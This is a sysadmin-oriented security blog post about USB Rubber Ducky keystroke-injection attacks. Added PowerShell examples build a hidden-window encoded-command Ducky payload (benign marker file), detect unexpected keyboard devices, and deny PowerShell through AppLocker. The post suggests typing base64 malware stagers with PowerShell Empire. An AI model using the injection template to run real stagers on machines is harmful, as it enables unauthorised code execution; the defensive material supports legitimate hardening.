The USB Threat is [Still] Real — Pentest Tools for Sysadmins, Continued

Jeremy Trinka
4 min read · Apr 19, 2018


This is a continuation of my post “Five Pentest Tools and Techniques (That Every Sysadmin Should Know)”. If you haven’t gotten the chance to check it out, go do it! I’ll be waiting for you when you get back.

Preface

For those unfamiliar, the USB Rubber Ducky is a product sold by Hak5, which offers a variety of tools and gadgets for the aspiring pentester. What makes it so effective is that the Ducky, which looks exactly like a USB thumb drive, actually contains a programmable Human Interface Device (HID): to the host it enumerates as a keyboard and replays a pre-programmed series of keystrokes. Beyond the Rubber Ducky, the Teensy microcontroller board has similar capabilities, but in a far less discreet (well, non-existent) package, since it is a bare board rather than something that passes for a thumb drive.

USB HID class peripherals are not the same as USB mass storage media.

For The Pentesters

Re-examining the idea of an initial infection vector, one of the more tedious challenges during an internal pentest is getting a Remote Access Trojan (RAT) onto the machine in the first place. Many organizations use some form of endpoint protection software which locks down the ability to freely connect a mass storage device or forces device encryption, and thereby blocks potentially malicious files from being transferred to the machine. Kudos to those of you that do this, by the way.

What about HIDs? Computers recognize mass storage devices and HID devices differently, since the HID class is associated with input devices like keyboards and mice. A device that enumerates as a keyboard is accepted without any of the checks applied to removable storage, and whatever it types runs with the privileges of the logged-on user. Many organizations do not consider this.

Next, let’s also remember that a program is essentially just code that was typed out, compiled, and run. What if, rather than copying a file to the disk, we could just type it out and run it? What if, instead of writing out the code and compiling it, we simply typed a base64 encoded malware stager and let the target decode and execute it, using the -EncodedCommand feature that just so happens to be built into PowerShell? There are a lot of possibilities. Check out PowerShell Empire, which comes with support for the Ducky out-of-the-box.
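To make the "just type it" idea concrete, here is an added example (not from the original post, and not Hak5's or Empire's code) that builds the form powershell.exe expects for -EncodedCommand, which is base64 over UTF-16LE text, and wraps it in Ducky Script 1.0 keystroke commands. The payload is a harmless marker file so the mechanism can be tested on your own lab machine; the function and file names are my own choices, and the delays are assumptions you would tune to the target.

```powershell
# Added example, not from the original post or from Hak5/Empire. Produces the
# -EncodedCommand payload for a benign script and a Ducky Script that types it.
# Function names, delays and the output file name are assumptions.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$ScriptText)
    # powershell.exe -EncodedCommand decodes base64 into UTF-16LE text,
    # which is exactly what [Text.Encoding]::Unicode produces.
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($ScriptText))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Encoded)
    # Reverse direction, used here only to verify the round trip before flashing anything.
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Encoded))
}

function New-DuckyScript {
    param([Parameter(Mandatory)][string]$Encoded)
    # Ducky Script 1.0: GUI r opens the Run dialog; the delays give the host time
    # to finish enumerating the "keyboard" and to draw the dialog before typing.
    @(
        'DELAY 1000',
        'GUI r',
        'DELAY 500',
        "STRING powershell -NoP -W Hidden -Enc $Encoded",
        'ENTER'
    ) -join "`r`n"
}

# Benign marker payload: proves keystroke execution without touching the network.
# Single quotes keep $env:TEMP etc. literal so they expand on the target, not here.
$payload = 'Set-Content -Path (Join-Path $env:TEMP "hid-test.txt") -Value ("Typed on {0} at {1}" -f $env:COMPUTERNAME, (Get-Date -Format o))'

$encoded = ConvertTo-EncodedCommand -ScriptText $payload
if ((ConvertFrom-EncodedCommand -Encoded $encoded) -ne $payload) { throw 'Round-trip check failed' }

$ducky = New-DuckyScript -Encoded $encoded
Set-Content -Path '.\payload.txt' -Value $ducky -Encoding ASCII

"Encoded payload is $($encoded.Length) characters; the device will type every one of them."
$ducky
```

The resulting payload.txt is what you feed to Hak5's Duck Encoder to produce the inject.bin the device loads. Two practical caveats: the base64 alphabet is safe on a US keyboard layout, but the encoder's layout must match the target's or the typed characters will be wrong; and the flip side for defenders is that explorer.exe spawning powershell.exe with -Enc on the command line is a high-signal event if command-line auditing (Event ID 4688 with process command line logging) is enabled.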

If you are a pentester, or aspiring to become one, know that time during testing is of the essence. The pressure is on as soon as you step into the office. Save yourself some time, and keep a programmable HID in your bag.

For The Sysadmins

A study by the University of Illinois indicated that roughly half (48%) of USB drives dropped in public were picked up, connected, and had their stored files opened by whoever found them. Applying this knowledge now, imagine a device that performs its malicious actions the moment it is connected, without the finder ever having to open a file. For some additional reading, check out the Naked Security by Sophos article on the subject. Fascinating stuff.

If you run IT at your organization, think about your facility. You more than likely have a large parking lot out front or in back, or maybe a parking garage that may be publicly accessible. If your company became a target, what would stop someone from dropping something that resembled a USB device conveniently around the parking spaces with the “Reserved for Chief Financial Officer, XYZ Securities” sign posted in front of them? Humans are instinctively curious. What if that device said “PRIVATE” across it?

The point is, the USB threat is bigger than just mass storage media, and the mitigation is harder than for most of the other items on the list (short of a wholesale application whitelisting deployment, which is no small project itself).

Actually, I would dare say that the most difficult direct mitigation in the whole “Pentesting Tools” list is this one: end-user training.

Ensure this happens at least once a year for all employees. Remind everyone that they must lock their computers when unattended, since a keystroke-injecting HID can only do what is described here inside an unlocked, logged-on session. For executives, make it business focused. Remind them that they may become the target of a whale phishing campaign or corporate espionage, and to be wary of connecting anything foreign to their machines or the network. I know it can be especially difficult to tell executives they can’t or shouldn’t do something, but try to word it appropriately.

Sure, one could go as far as to say “disable your USB ports”, but there is more to a blanket suggestion like that than meets the eye. At this time, a recommendation like that would be very difficult to scale for most organizations, and many actually do require their front-facing USB ports for legitimate business purposes. If disabling USB access to workstations at a hardware level is somehow feasible at your organization, without a doubt, do it!

What is important is to be aware that just because you have one piece of software that performs some action against USB mass storage devices, it may not be taking other USB device classes, such as HIDs, into account. Check what your control actually enforces: a removable-storage policy that blocks file copies says nothing about a device that enumerates as a keyboard.
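One quick way to see what your storage-focused control is not looking at is to inventory keyboard-class devices yourself. The script below is an added example, not from the original post or any vendor: it pulls the vendor/product pair out of each keyboard's Plug and Play instance ID, flags pairs that are not on an allow list, and flags a host that suddenly has more keyboards than expected. The allow-list entry, the sample device records, and the function names are constructed for illustration; it assumes Windows 8.1/10 or later for Get-PnpDevice.

```powershell
# Added example, not from the original post. Inventories keyboard-class devices
# and reports unexpected ones. The allow list and sample records are made up;
# Get-PnpDevice needs Windows 8.1/10 or later.

function Get-KeyboardVidPid {
    param([Parameter(Mandatory)][string]$InstanceId)
    # USB/HID instance IDs embed the vendor and product IDs, e.g.
    # HID\VID_046D&PID_C31C&MI_00\7&... ; built-in PS/2 or ACPI keyboards have none.
    if ($InstanceId -match 'VID_([0-9A-Fa-f]{4})&PID_([0-9A-Fa-f]{4})') {
        return ('{0}:{1}' -f $Matches[1].ToUpper(), $Matches[2].ToUpper())
    }
    return $null
}

function Find-UnexpectedKeyboard {
    param(
        [Parameter(Mandatory)][object[]]$Device,   # objects exposing InstanceId and FriendlyName
        [string[]]$AllowedVidPid = @(),
        [int]$MaxKeyboards = 1
    )
    $findings = @()
    foreach ($d in $Device) {
        $vp = Get-KeyboardVidPid -InstanceId $d.InstanceId
        if ($vp -and ($vp -notin $AllowedVidPid)) {
            $findings += [pscustomobject]@{
                Reason     = 'VID:PID not on allow list'
                VidPid     = $vp
                Device     = $d.FriendlyName
                InstanceId = $d.InstanceId
            }
        }
    }
    if ($Device.Count -gt $MaxKeyboards) {
        $findings += [pscustomobject]@{
            Reason     = "More than $MaxKeyboards keyboard(s) present ($($Device.Count))"
            VidPid     = $null
            Device     = $null
            InstanceId = $null
        }
    }
    return $findings
}

# Constructed sample: a laptop's built-in keyboard plus a just-inserted USB HID.
$sample = @(
    [pscustomobject]@{ InstanceId = 'ACPI\MSFT0001\4&2c1d2a3f&0';                    FriendlyName = 'Standard PS/2 Keyboard' }
    [pscustomobject]@{ InstanceId = 'HID\VID_1A2B&PID_3C4D&MI_00\7&1f0e2d3c&0&0000'; FriendlyName = 'HID Keyboard Device' }
)
Find-UnexpectedKeyboard -Device $sample -AllowedVidPid @('046D:C31C') -MaxKeyboards 1 | Format-Table

# Live check against the keyboards currently present on this host.
$live = Get-PnpDevice -Class Keyboard -PresentOnly -ErrorAction SilentlyContinue
if ($live) {
    Find-UnexpectedKeyboard -Device $live -AllowedVidPid @('046D:C31C') -MaxKeyboards 1 | Format-Table
}
```

Treat the VID:PID allow list as a tripwire rather than a guarantee: a programmable HID reports whatever vendor and product IDs its firmware is configured to report, so the "more keyboards than expected" count and the arrival time matter more than the IDs. For fleet-wide visibility, the same device arrivals are recorded in the Security log as Event ID 6416 once "Audit PNP Activity" is enabled, which is worth forwarding to your SIEM alongside the mass storage events you already collect.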

In addition to annual user training, take a defense-in-depth approach to your endpoint security. Do not rely on only one technology to defend yourself from foreign USB devices, or the payloads they may carry. Leveraging antivirus in conjunction with other endpoint protections such as application whitelisting and Endpoint Detection and Response (EDR) software is always preferred. Lock down unnecessary applications, such as PowerShell, with AppLocker for the general user base. Human Resources and the receptionist aren’t using it for anything anyway.
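Here is what that AppLocker lockdown looks like as an added example (my own, not from the original post or Microsoft's documentation). It builds a local policy that denies powershell.exe and powershell_ise.exe to one group by publisher signature, so a copy of the binary in a user's profile is caught too, keeps the three default allow rules so nothing else becomes implicitly blocked, and starts in audit mode. It assumes a Windows edition that ships AppLocker, the AppLocker cmdlets, and an elevated session; the target group SID is a placeholder, and the function names are mine.

```powershell
# Added example, not from the original post. Generates and dry-runs a local
# AppLocker policy that denies PowerShell to a group by publisher rule.
# Assumes AppLocker-capable Windows, its cmdlets, and an elevated session.

$TargetGroupSid = 'S-1-5-32-545'   # BUILTIN\Users is a placeholder: Administrators are members too, so narrow this in production.
$PolicyPath     = Join-Path $env:TEMP 'applocker-deny-powershell.xml'
$MicrosoftPublisher = 'O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US'

function New-AllowPathRuleXml {
    param([string]$Name, [string]$Path, [string]$Sid)
@"
    <FilePathRule Id="$([guid]::NewGuid())" Name="$Name" Description="" UserOrGroupSid="$Sid" Action="Allow">
      <Conditions><FilePathCondition Path="$Path" /></Conditions>
    </FilePathRule>
"@
}

function New-DenyPublisherRuleXml {
    param([string]$BinaryName, [string]$Sid)
    # A publisher rule follows the signed binary wherever it is copied; a path rule would not.
@"
    <FilePublisherRule Id="$([guid]::NewGuid())" Name="Deny $BinaryName" Description="Block PowerShell for standard users" UserOrGroupSid="$Sid" Action="Deny">
      <Conditions>
        <FilePublisherCondition PublisherName="$MicrosoftPublisher" ProductName="*" BinaryName="$BinaryName">
          <BinaryVersionRange LowSection="*" HighSection="*" />
        </FilePublisherCondition>
      </Conditions>
    </FilePublisherRule>
"@
}

function New-PowerShellDenyPolicyXml {
    param([string]$Sid)
    # Without the default allow rules an Exe collection with any rule at all
    # would block everything not explicitly allowed. AuditOnly first; switch to
    # Enabled after reviewing event 8003 in the AppLocker "EXE and DLL" log.
    $rules = @(
        New-AllowPathRuleXml -Name '(Default) Program Files' -Path '%PROGRAMFILES%\*' -Sid 'S-1-1-0'
        New-AllowPathRuleXml -Name '(Default) Windows folder' -Path '%WINDIR%\*'       -Sid 'S-1-1-0'
        New-AllowPathRuleXml -Name '(Default) Administrators' -Path '*'                -Sid 'S-1-5-32-544'
        New-DenyPublisherRuleXml -BinaryName 'POWERSHELL.EXE'     -Sid $Sid
        New-DenyPublisherRuleXml -BinaryName 'POWERSHELL_ISE.EXE' -Sid $Sid
    ) -join "`n"
    "<AppLockerPolicy Version=`"1`">`n  <RuleCollection Type=`"Exe`" EnforcementMode=`"AuditOnly`">`n$rules`n  </RuleCollection>`n</AppLockerPolicy>"
}

New-PowerShellDenyPolicyXml -Sid $TargetGroupSid | Set-Content -Path $PolicyPath -Encoding UTF8

# Dry run: an explicit deny outranks the %WINDIR% allow, so both hosts should report Denied for the group.
$hosts = "$env:WINDIR\System32\WindowsPowerShell\v1.0\powershell.exe",
         "$env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Test-AppLockerPolicy -XmlPolicy $PolicyPath -Path $hosts -User $TargetGroupSid |
    Format-Table FilePath, PolicyDecision, MatchingRule

# Apply only after the dry run reads as expected. AppLocker evaluates nothing
# unless the Application Identity service is running; -Merge keeps existing rules.
#   sc.exe config appidsvc start= auto ; Start-Service AppIDSvc
#   Set-AppLockerPolicy -XmlPolicy $PolicyPath -Merge
```

The apply step is left commented so running the example changes nothing on the host. Two things to check before enforcing: scope the deny to a group that does not contain your administrators (AppLocker evaluates deny rules first, so an admin in the denied group is locked out as well), and remember that PowerShell 7 (pwsh.exe) is a separate product that this rule does not cover if it is installed.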

Just some (more) food for thought.

Thanks for reading! The goal here is to help organizations of all sizes tackle complex IT security challenges, and bridge cybersecurity policy into operations. Comments or critiques? Reach me on LinkedIn, Twitter, email — jeremy.trinka[at]gmail[dot]com, or reply below.



Jeremy Trinka

Cybersecurity SME in the Nation's Capital. Opinions expressed are solely my own and do not express the views or opinions of my employer.